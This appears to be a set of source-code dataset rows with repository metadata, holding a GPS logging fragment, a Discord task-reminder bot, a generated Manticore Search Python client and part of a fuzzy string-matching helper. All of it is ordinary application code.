logger.info(logString("Last GPS fix: %f %f %f" % (rLat, rLon, iHgt)))
now = time.time()
deltaTime = abs(now - rTimeStamp)
if deltaTime > 10:
timeAlarm = "***"
setRTC(rTimeStamp)
logger.info(logString("RTC updated to GPS"))
else:
timeAlarm = ""
# Write GPS status data
f = open("/mnt/ramdisk/gps_state.txt", "w")
f.write("Time delta (RTC - GPS): %f %s\n" % (now - rTimeStamp, timeAlarm))
f.write("Lat, Lon: %f, %f\n" % (rLat, rLon))
f.write("Altitude: %d\n" % iHgt)
f.write("Angle: %d\n" % iAng)
f.write("Speed: %d\n" % iSpeed)
f.write("Satellites: %d\n" % iSat)
f.write("Message priority: %d\n" % iPriority)
f.close()
# Write positional data in computer-friendly form
f = open("/mnt/ramdisk/Position.csv", "w")
f.write("%f, %f, %d\n" % (rLat, rLon, iHgt))
f.close()
if isFirst:
isFirst = False
else:
if deltaTime > 60.0:
# No GPS updates ever since: force modem reboot....
logger.warning(logString("GPS is apparently blocked"))
isFirst = True
oldTimeStamp = 0.0
else:
oldTimeStamp = rTimeStamp
else: # Waiting: do nothing but waiting a little bit
time.sleep(5)  # brief pause while inactive (5 s is an assumed interval; the original call was missing its argument)
logger.info(logString("*** Terminating execution"))
| 3,200 | 0 | 162 |
683ac887e86d6f1048221167834abc61df55b5d0 | 4,495 | py | Python | bot.py | FightMan01/discord-feladat-r-gz-t- | 65f0f29247fa0b34ec7753e763a81c3f5e35c048 | ["MIT"] | 1 | 2020-04-28T07:25:40.000Z | 2020-04-28T07:25:40.000Z | bot.py | FightMan01/discord-feladat-rogzito | 65f0f29247fa0b34ec7753e763a81c3f5e35c048 | ["MIT"] | null | null | null | bot.py | FightMan01/discord-feladat-rogzito | 65f0f29247fa0b34ec7753e763a81c3f5e35c048 | ["MIT"] | null | null | null |
import discord
from discord.ext import commands, tasks
import asyncio
import time
import datetime
import json
import aiohttp
import os
from discord import Webhook, AsyncWebhookAdapter
client = commands.AutoShardedBot(command_prefix=".")
Client = discord.Client()
client.remove_command('help')
with open("adat.json") as f:
adat = json.load(f)
@client.event
@client.command()
@tasks.loop(minutes=5)
@client.command()
client.run("TOKEN")
| 38.09322 | 153 | 0.576418 |
import discord
from discord.ext import commands, tasks
import asyncio
import time
import datetime
import json
import aiohttp
import os
from discord import Webhook, AsyncWebhookAdapter
client = commands.AutoShardedBot(command_prefix=".")
Client = discord.Client()
client.remove_command('help')
with open("adat.json") as f:
adat = json.load(f)
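# adat.json holds the recorded tasks; the "cache" and "cache2" lists track which task ids have
# already triggered the day-before and same-day reminders, respectively.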
@client.event
async def on_ready():
print("A bot készen van :P")
init.start()
await client.change_presence(activity=discord.Activity(name='Feladatok 👀', type=discord.ActivityType.watching), status=discord.Status.do_not_disturb)
@client.command()
async def rögzít(ctx, nap=None, *, szöveg=None):
if ctx.author.bot:
return
if not nap:
return await ctx.send(":x: Kérem adja meg, hány nap múlva esedékes a feladat.")
if not szöveg:
return await ctx.send(":x: Kérem adjon meg a feladathoz egy rövid szöveget!")
try:
nap = int(nap)
except:
return await ctx.send(":x: Kérem napnak csak számot adjon meg.")
esedékes = datetime.date.today() + datetime.timedelta(days=nap)
esedékes = str(esedékes.__format__("%Y.%m.%d."))
i = 0
for x in adat:
if not (x == "cache" or x == "cache2"):
i += 1
fid = i
if not "cache" in adat:
adat["cache"] = []
if not "cache2" in adat:
adat["cache2"] = []
adat[fid] = {}
adat[fid]["esedekes"] = esedékes
adat[fid]["szöveg"] = szöveg
adat[fid]["rögzítette"] = str(ctx.author.id)
with open("adat.json", "w") as f2:
json.dump(adat, f2)
await ctx.send(":white_check_mark: Feladat rögzítve!")
@tasks.loop(minutes=5)
async def init():
try:
await client.wait_until_ready()
await asyncio.gather(feladatell())
await asyncio.gather(feladatell2())
print("[INFO] ~> Feladat határidők ellenőrizve!")
except Exception as e:
print(f"[ERROR] ~> {e}")
async def feladatell():
for id in adat:
if not (id == "cache" or id == "cache2"):
if not id in adat["cache"]:
esedékes = adat[id]["esedekes"]
szöveg = adat[id]["szöveg"]
holnap = datetime.date.today() + datetime.timedelta(days=1)
holnap = str(holnap.__format__("%Y.%m.%d."))
if esedékes == holnap:
csati = client.get_channel(695570356152303637)
rögzítő = client.get_user(int(adat[id]["rögzítette"]))
await csati.send(f"**{rögzítő.name}** által rögzített feladat **holnap** esedékes!\n:arrow_forward: {szöveg}")
adat["cache"].append(id)
with open("adat.json", "w") as f2:
json.dump(adat, f2)
async def feladatell2():
for id in adat:
if not (id == "cache" or id == "cache2"):
if not id in adat["cache2"]:
esedékes = adat[id]["esedekes"]
szöveg = adat[id]["szöveg"]
holnap = datetime.date.today()
holnap = str(holnap.__format__("%Y.%m.%d."))
if esedékes == holnap:
csati = client.get_channel(695570356152303637)
rögzítő = client.get_user(int(adat[id]["rögzítette"]))
await csati.send(f"**{rögzítő.name}** által rögzített feladat **ma** esedékes!\n:arrow_forward: {szöveg}")
adat["cache2"].append(id)
with open("adat.json", "w") as f2:
json.dump(adat, f2)
@client.command()
async def feladatok(ctx):
if ctx.author.bot:
return
embed = discord.Embed(title="Feladatok", color=0x00ff00, timestamp=datetime.datetime.utcnow())
for id in adat:
if not (id == "cache" or id == "cache2"):
ma = datetime.datetime.today().__format__("%Y.%m.%d.")
ma = datetime.datetime.strptime(ma, "%Y.%m.%d.")
esedekes = adat[id]["esedekes"]
szöveg = adat[id]["szöveg"]
dátum = datetime.datetime.strptime(adat[id]["esedekes"], "%Y.%m.%d.")
if not dátum < ma:
rögzítő = client.get_user(int(adat[id]["rögzítette"]))
embed.add_field(name="Feladat", value=f"**Rögzítette:** {rögzítő.name}\n**Határidő:** {esedekes}\n**Szöveg:** {szöveg}")
if len(embed.fields) > 0:
await ctx.send(embed=embed)
else:
await ctx.send(":tada: Jelenleg nincs egy határidős feladat sem.")
client.run("TOKEN")
| 3,999 | 0 | 134 |
2f7166295fc0fb168bd8d66ddd176c29ddcd09f4 | 16,491 | py | Python | out/manticoresearch-python/manticoresearch/api/search_api.py | mihaj/openapi | 29e878b0be1218a897c4c86bf9d8d51f4d1a3e57 | ["MIT"] | null | null | null | out/manticoresearch-python/manticoresearch/api/search_api.py | mihaj/openapi | 29e878b0be1218a897c4c86bf9d8d51f4d1a3e57 | ["MIT"] | 3 | 2021-12-21T08:18:48.000Z | 2022-03-24T10:50:37.000Z | out/manticoresearch-python/manticoresearch/api/search_api.py | mihaj/openapi | 29e878b0be1218a897c4c86bf9d8d51f4d1a3e57 | ["MIT"] | 5 | 2021-12-11T06:10:14.000Z | 2022-03-18T11:05:24.000Z |
# coding: utf-8
# Manticore Search Client
# Copyright (c) 2020-2021, Manticore Software LTD (https://manticoresearch.com)
#
# All rights reserved
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from manticoresearch.api_client import ApiClient
from manticoresearch.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class SearchApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def percolate(self, index, percolate_request, **kwargs): # noqa: E501
"""Perform reverse search on a percolate index # noqa: E501
Performs a percolate search. This method must be used only on percolate indexes. Expects two parameters: the index name and an object with array of documents to be tested. An example of the documents object: ``` {\"query\":{\"percolate\":{\"document\":{\"content\":\"sample content\"}}}} ``` Responds with an object with matched stored queries: ``` {'timed_out':false,'hits':{'total':2,'max_score':1,'hits':[{'_index':'idx_pq_1','_type':'doc','_id':'2','_score':'1','_source':{'query':{'match':{'title':'some'},}}},{'_index':'idx_pq_1','_type':'doc','_id':'5','_score':'1','_source':{'query':{'ql':'some | none'}}}]}} ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.percolate(index, percolate_request, async_req=True)
>>> result = thread.get()
:param index: Name of the percolate index (required)
:type index: str
:param percolate_request: (required)
:type percolate_request: PercolateRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: SearchResponse
"""
kwargs['_return_http_data_only'] = True
return self.percolate_with_http_info(index, percolate_request, **kwargs) # noqa: E501
def percolate_with_http_info(self, index, percolate_request, **kwargs): # noqa: E501
"""Perform reverse search on a percolate index # noqa: E501
Performs a percolate search. This method must be used only on percolate indexes. Expects two parameters: the index name and an object with array of documents to be tested. An example of the documents object: ``` {\"query\":{\"percolate\":{\"document\":{\"content\":\"sample content\"}}}} ``` Responds with an object with matched stored queries: ``` {'timed_out':false,'hits':{'total':2,'max_score':1,'hits':[{'_index':'idx_pq_1','_type':'doc','_id':'2','_score':'1','_source':{'query':{'match':{'title':'some'},}}},{'_index':'idx_pq_1','_type':'doc','_id':'5','_score':'1','_source':{'query':{'ql':'some | none'}}}]}} ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.percolate_with_http_info(index, percolate_request, async_req=True)
>>> result = thread.get()
:param index: Name of the percolate index (required)
:type index: str
:param percolate_request: (required)
:type percolate_request: PercolateRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(SearchResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'index',
'percolate_request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method percolate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'index' is set
if self.api_client.client_side_validation and ('index' not in local_var_params or # noqa: E501
local_var_params['index'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `index` when calling `percolate`") # noqa: E501
# verify the required parameter 'percolate_request' is set
if self.api_client.client_side_validation and ('percolate_request' not in local_var_params or # noqa: E501
local_var_params['percolate_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `percolate_request` when calling `percolate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'index' in local_var_params:
path_params['index'] = local_var_params['index'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'percolate_request' in local_var_params:
body_params = local_var_params['percolate_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
res = self.api_client.call_api(
'/json/pq/{index}/search', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SearchResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
return res
def search(self, search_request, **kwargs): # noqa: E501
"""Performs a search # noqa: E501
Expects an object with mandatory properties: * the index name * the match query object Example : ``` {'index':'movies','query':{'bool':{'must':[{'query_string':' movie'}]}},'script_fields':{'myexpr':{'script':{'inline':'IF(rating>8,1,0)'}}},'sort':[{'myexpr':'desc'},{'_score':'desc'}],'profile':true} ``` It responds with an object with: - time of execution - if the query timed out - an array with hits (matched documents) - additional, if profiling is enabled, an array with profiling information is attached ``` {'took':10,'timed_out':false,'hits':{'total':2,'hits':[{'_id':'1','_score':1,'_source':{'gid':11}},{'_id':'2','_score':1,'_source':{'gid':12}}]}} ``` For more information about the match query syntax, additional paramaters that can be set to the input and response, please check: https://manual.manticoresearch.com/Searching/Full_text_matching/Basic_usage#HTTP. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search(search_request, async_req=True)
>>> result = thread.get()
:param search_request: (required)
:type search_request: SearchRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: SearchResponse
"""
kwargs['_return_http_data_only'] = True
return self.search_with_http_info(search_request, **kwargs) # noqa: E501
def search_with_http_info(self, search_request, **kwargs): # noqa: E501
"""Performs a search # noqa: E501
Expects an object with mandatory properties: * the index name * the match query object Example : ``` {'index':'movies','query':{'bool':{'must':[{'query_string':' movie'}]}},'script_fields':{'myexpr':{'script':{'inline':'IF(rating>8,1,0)'}}},'sort':[{'myexpr':'desc'},{'_score':'desc'}],'profile':true} ``` It responds with an object with: - time of execution - if the query timed out - an array with hits (matched documents) - additional, if profiling is enabled, an array with profiling information is attached ``` {'took':10,'timed_out':false,'hits':{'total':2,'hits':[{'_id':'1','_score':1,'_source':{'gid':11}},{'_id':'2','_score':1,'_source':{'gid':12}}]}} ``` For more information about the match query syntax, additional paramaters that can be set to the input and response, please check: https://manual.manticoresearch.com/Searching/Full_text_matching/Basic_usage#HTTP. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_with_http_info(search_request, async_req=True)
>>> result = thread.get()
:param search_request: (required)
:type search_request: SearchRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(SearchResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'search_request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'search_request' is set
if self.api_client.client_side_validation and ('search_request' not in local_var_params or # noqa: E501
local_var_params['search_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `search_request` when calling `search`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'search_request' in local_var_params:
body_params = local_var_params['search_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
res = self.api_client.call_api(
'/json/search', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SearchResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
return res
| 51.214286 | 918 | 0.608271 |
# coding: utf-8
# Manticore Search Client
# Copyright (c) 2020-2021, Manticore Software LTD (https://manticoresearch.com)
#
# All rights reserved
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from manticoresearch.api_client import ApiClient
from manticoresearch.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class SearchApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def percolate(self, index, percolate_request, **kwargs): # noqa: E501
"""Perform reverse search on a percolate index # noqa: E501
Performs a percolate search. This method must be used only on percolate indexes. Expects two parameters: the index name and an object with array of documents to be tested. An example of the documents object: ``` {\"query\":{\"percolate\":{\"document\":{\"content\":\"sample content\"}}}} ``` Responds with an object with matched stored queries: ``` {'timed_out':false,'hits':{'total':2,'max_score':1,'hits':[{'_index':'idx_pq_1','_type':'doc','_id':'2','_score':'1','_source':{'query':{'match':{'title':'some'},}}},{'_index':'idx_pq_1','_type':'doc','_id':'5','_score':'1','_source':{'query':{'ql':'some | none'}}}]}} ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.percolate(index, percolate_request, async_req=True)
>>> result = thread.get()
:param index: Name of the percolate index (required)
:type index: str
:param percolate_request: (required)
:type percolate_request: PercolateRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: SearchResponse
"""
kwargs['_return_http_data_only'] = True
return self.percolate_with_http_info(index, percolate_request, **kwargs) # noqa: E501
def percolate_with_http_info(self, index, percolate_request, **kwargs): # noqa: E501
"""Perform reverse search on a percolate index # noqa: E501
Performs a percolate search. This method must be used only on percolate indexes. Expects two parameters: the index name and an object with array of documents to be tested. An example of the documents object: ``` {\"query\":{\"percolate\":{\"document\":{\"content\":\"sample content\"}}}} ``` Responds with an object with matched stored queries: ``` {'timed_out':false,'hits':{'total':2,'max_score':1,'hits':[{'_index':'idx_pq_1','_type':'doc','_id':'2','_score':'1','_source':{'query':{'match':{'title':'some'},}}},{'_index':'idx_pq_1','_type':'doc','_id':'5','_score':'1','_source':{'query':{'ql':'some | none'}}}]}} ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.percolate_with_http_info(index, percolate_request, async_req=True)
>>> result = thread.get()
:param index: Name of the percolate index (required)
:type index: str
:param percolate_request: (required)
:type percolate_request: PercolateRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: return only the response data, without
the HTTP status code and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(SearchResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'index',
'percolate_request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method percolate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'index' is set
if self.api_client.client_side_validation and ('index' not in local_var_params or # noqa: E501
local_var_params['index'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `index` when calling `percolate`") # noqa: E501
# verify the required parameter 'percolate_request' is set
if self.api_client.client_side_validation and ('percolate_request' not in local_var_params or # noqa: E501
local_var_params['percolate_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `percolate_request` when calling `percolate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'index' in local_var_params:
path_params['index'] = local_var_params['index'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'percolate_request' in local_var_params:
body_params = local_var_params['percolate_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
res = self.api_client.call_api(
'/json/pq/{index}/search', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SearchResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
return res
def search(self, search_request, **kwargs): # noqa: E501
"""Performs a search # noqa: E501
Expects an object with mandatory properties: * the index name * the match query object Example : ``` {'index':'movies','query':{'bool':{'must':[{'query_string':' movie'}]}},'script_fields':{'myexpr':{'script':{'inline':'IF(rating>8,1,0)'}}},'sort':[{'myexpr':'desc'},{'_score':'desc'}],'profile':true} ``` It responds with an object with: - time of execution - if the query timed out - an array with hits (matched documents) - additional, if profiling is enabled, an array with profiling information is attached ``` {'took':10,'timed_out':false,'hits':{'total':2,'hits':[{'_id':'1','_score':1,'_source':{'gid':11}},{'_id':'2','_score':1,'_source':{'gid':12}}]}} ``` For more information about the match query syntax, additional paramaters that can be set to the input and response, please check: https://manual.manticoresearch.com/Searching/Full_text_matching/Basic_usage#HTTP. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search(search_request, async_req=True)
>>> result = thread.get()
:param search_request: (required)
:type search_request: SearchRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: SearchResponse
"""
kwargs['_return_http_data_only'] = True
return self.search_with_http_info(search_request, **kwargs) # noqa: E501
def search_with_http_info(self, search_request, **kwargs): # noqa: E501
"""Performs a search # noqa: E501
Expects an object with mandatory properties: * the index name * the match query object Example : ``` {'index':'movies','query':{'bool':{'must':[{'query_string':' movie'}]}},'script_fields':{'myexpr':{'script':{'inline':'IF(rating>8,1,0)'}}},'sort':[{'myexpr':'desc'},{'_score':'desc'}],'profile':true} ``` It responds with an object with: - time of execution - if the query timed out - an array with hits (matched documents) - additional, if profiling is enabled, an array with profiling information is attached ``` {'took':10,'timed_out':false,'hits':{'total':2,'hits':[{'_id':'1','_score':1,'_source':{'gid':11}},{'_id':'2','_score':1,'_source':{'gid':12}}]}} ``` For more information about the match query syntax, additional paramaters that can be set to the input and response, please check: https://manual.manticoresearch.com/Searching/Full_text_matching/Basic_usage#HTTP. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_with_http_info(search_request, async_req=True)
>>> result = thread.get()
:param search_request: (required)
:type search_request: SearchRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: return only the response data, without
the HTTP status code and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(SearchResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'search_request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'search_request' is set
if self.api_client.client_side_validation and ('search_request' not in local_var_params or # noqa: E501
local_var_params['search_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `search_request` when calling `search`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'search_request' in local_var_params:
body_params = local_var_params['search_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
res = self.api_client.call_api(
'/json/search', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SearchResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
return res
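# --- Editor's usage sketch (not part of the generated client) ----------------
# A minimal way to drive the class above, assuming a Manticore Search server is
# reachable through ApiClient's default configuration and that an index named
# 'movies' already exists (both are assumptions made for illustration only).
# A plain dict is passed as the search request here; a SearchRequest model
# object can be used instead.
#
#     api = SearchApi(ApiClient())
#     response = api.search({
#         "index": "movies",
#         "query": {"match": {"title": "some movie"}},
#         "limit": 10,
#     })
#     print(response.hits)   # SearchResponse carries took/timed_out/hits fields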
| 120 | 0 | 27 |
d5892abdd9874781d3c8a04d059d2d242933ccc9 | 8,217 | py | Python | sciencebeam_judge/utils/fuzzy.py | elifesciences/sciencebeam-judge | 357f1b4266674611b24371224468db268ed4574e | [
"MIT"
] | null | null | null | sciencebeam_judge/utils/fuzzy.py | elifesciences/sciencebeam-judge | 357f1b4266674611b24371224468db268ed4574e | [
"MIT"
] | 189 | 2018-01-11T17:14:18.000Z | 2022-03-28T17:30:11.000Z | sciencebeam_judge/utils/fuzzy.py | elifesciences/sciencebeam-judge | 357f1b4266674611b24371224468db268ed4574e | [
"MIT"
] | null | null | null | import logging
from typing import AnyStr, Callable, Iterable, List, Optional, Tuple
LOGGER = logging.getLogger(__name__)
T_IsJunkFunction = Callable[[AnyStr, int], bool]
EMPTY_MATCHING_BLOCKS = MatchingBlocks([])
| 29.451613 | 95 | 0.62103 | import logging
from typing import AnyStr, Callable, Iterable, List, Optional, Tuple
LOGGER = logging.getLogger(__name__)
T_IsJunkFunction = Callable[[AnyStr, int], bool]
class StringView:
def __init__(self, original_string: str, in_view: List[bool]):
self.original_string = original_string
self.in_view = in_view
self.string_view = ''.join((
ch
for ch, is_included in zip(original_string, in_view)
if is_included
))
self.original_index_at = [
index
for index, is_included in enumerate(in_view)
if is_included
]
self._view_index_at: Optional[List[int]] = None
@staticmethod
def from_view_map(original_string: str, in_view: List[bool]) -> 'StringView':
return StringView(original_string, in_view)
@property
def view_index_at(self) -> List[int]:
if self._view_index_at is not None:
return self._view_index_at
view_index_at = []
index = 0
for is_included in self.in_view:
view_index_at.append(index)
if is_included:
index += 1
self._view_index_at = view_index_at
return view_index_at
def __len__(self):
return len(self.string_view)
def __str__(self):
return self.string_view
def __repr__(self):
return '%s(original=%r, in_view=%s, view=%r)' % (
type(self).__name__, self.original_string, self.in_view, self.string_view
)
class IndexRange(Tuple[int, int]):
@property
def size(self):
return self[1] - self[0]
class MatchingBlocks(Tuple[Tuple[int, int, int], ...]):
def with_offset(self, a_offset: int, b_offset: int) -> 'MatchingBlocks':
if not a_offset and not b_offset:
return self
return MatchingBlocks(tuple(
(ai + a_offset, bi + b_offset, size)
for ai, bi, size in self
))
@property
def non_empty(self) -> 'MatchingBlocks':
return MatchingBlocks(tuple(
(ai, bi, size)
for ai, bi, size in self
if size
))
@property
def first_block(self) -> Optional[Tuple[int, int, int]]:
if not self:
return None
first_block = self[0]
first_block_size = first_block[2]
if first_block_size:
return first_block
return None
@property
def last_block(self) -> Optional[Tuple[int, int, int]]:
index = len(self) - 1
while index >= 0:
last_block = self[index]
last_block_size = last_block[2]
if last_block_size:
return last_block
index -= 1
return None
def get_start_offset(self, seq_index: int):
first_block = self.first_block
if not first_block:
return None
return first_block[seq_index]
@property
def start_a(self):
return self.get_start_offset(0)
@property
def start_b(self):
return self.get_start_offset(1)
